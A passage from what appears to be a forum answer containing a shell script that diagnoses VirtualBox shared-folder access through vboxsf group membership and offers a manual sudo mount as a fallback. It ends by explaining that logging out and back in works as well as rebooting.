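# shared_folder_check: 0 = ready, 2 = membership pending a new login, 1 = not a member
shared_folder_check() {
  me=$(id -un)
  if in_session_group vboxsf; then
    echo "ok: vboxsf is active for this session"
    return 0
  fi
  if configured_in_group "$me" vboxsf; then
    echo "pending: $me was added to vboxsf but this session predates it; log out and back in"
    return 2
  fi
  echo "missing: $me is not in vboxsf; run: sudo adduser $me vboxsf, then log in again"
  return 1
}

# mount_share_manually: mount the share owned by the current user so it is usable without
# vboxsf membership (needs sudo, and the Guest Additions kernel module must be loaded).
mount_share_manually() {
  sudo mkdir -p "$MOUNT_POINT"
  sudo mount -t vboxsf -o "uid=$(id -u),gid=$(id -g)" "$SHARE" "$MOUNT_POINT"
}

# Usage: sh sf_check.sh diag     (report which of the three cases applies)
#        sh sf_check.sh mount    (fallback manual mount)
case "${1:-}" in
  diag)  shared_folder_check ;;
  mount) mount_share_manually ;;
esac
```

The `pending` case is the one the post's "reboot and try again" advice is really curing: a reboot forces a fresh login, but logging out and back in does the same without restarting the VM.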